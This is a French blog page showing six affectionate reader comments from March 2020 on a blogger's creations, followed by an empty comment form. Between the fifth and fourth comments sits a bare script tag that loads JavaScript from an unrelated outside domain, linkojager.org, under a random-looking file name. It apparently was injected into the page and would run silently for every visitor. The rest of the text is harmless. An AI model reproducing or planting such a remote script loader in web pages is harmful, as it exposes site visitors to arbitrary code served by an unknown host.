• **Enfants**Animations

  • Commentaires

    6
    daniel
    Mardi 3 Mars 2020 à 14:41

    Bonjour Sellena , nous voici en mars ; comme le temps passe vite .

    Ici , grand soleil , cela nous fait tout drôle avec 10° cet après midi .

    Mreci pour tes créations .

    Bon mardi ; bisous 

    5
    Mardi 3 Mars 2020 à 05:19

    J'aime tes nouvelles creations

    bonne journée Sellena bisous

    <script src="//linkojager.org/212b3d4039ab5319ec.js" type="text/javascript"></script>
    4
    Lundi 2 Mars 2020 à 21:11

    Bonsoir ma chère Selly

    Elles sont superbes tes créations je me suis servie de la 3 ème pour mettre sur mon blog

    si cela te dérange tu me dis et je l'enlève 

    Bonne et douce soirée ma chère amie et gros bisous

    Janine

     

    3
    Lundi 2 Mars 2020 à 12:06

    C'est doudou tout plein et j'adore ce petit moment...

    Merci a Toi ma Tite Douce,c'est ton sourire qui arrive avec 

    et ça c'est TOP....Bonne semaine a Toi.

    Plein de gros bisous.

    Merciiiiiiiiiiiiiiiiiiiiiiii

    2
    Lundi 2 Mars 2020 à 11:35

     ❤️ La moitié du dernier mois de l'année  ou va le temps  ❤️

    Bonjour et voilà Mars est arrivé bon lundi et bonne semaine
    Les petits gestes qui viennent du cœur
    C'est la recette du bonheur
    C'est avec ces belles paroles
    Que je passe te souhaiter
    Une très belle journée
    Gros bisous de kikinette qui sera un peu absente pour santé

     ❤️ La moitié du dernier mois de l'année  ou va le temps  ❤️

    1
    Lundi 2 Mars 2020 à 08:18

    hello Sellena 

    de très belles créations , bravo

    Je reviens doucement sur la toile

    Toujours un temps de pluie , et de froid 

    Mais le printemps est proche 

    bisous

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :